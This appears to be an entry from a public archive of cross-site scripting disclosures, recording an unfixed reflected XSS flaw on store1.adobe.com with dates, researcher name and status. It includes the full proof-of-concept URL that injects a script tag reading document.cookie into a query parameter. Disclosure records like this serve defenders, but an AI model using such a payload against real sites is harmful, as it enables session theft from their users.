Advertisements:
Security researcher SeeMe, has submitted on 03/10/2010 a cross-site-scripting (XSS) vulnerability affecting store1.adobe.com, which at the time of submission ranked 66 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 02/04/2012. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail.
Date submitted: 03/10/2010 Date published: 02/04/2012 Fixed? Mail us!Status:  UNFIXED
Author: SeeMe Domain: store1.adobe.com Category: XSS Pagerank: 66
URL: https://store1.adobe.com/cfusion/lad/xml.cfm?groupCode=SeeMe+%22%3E%3Cscript%3Ealert%28document.cook
ie%29%3C/script%3E+SeeMe&method=getLocalizedLabelsByGroup&uc=1&loc=en_us
Click here to view the mirror
Buy XSS Attacks book from Amazon!
XSS Attacks
Cross Site Scripting Exploits and Defense
Buy Detecting Malice book from RSnake
Website Fraud Loss Prevention
Advertisements
Home | News | Articles | Advisories | Submit | Alerts | Links | What is XSS | About | Contact | Some Rights Reserved.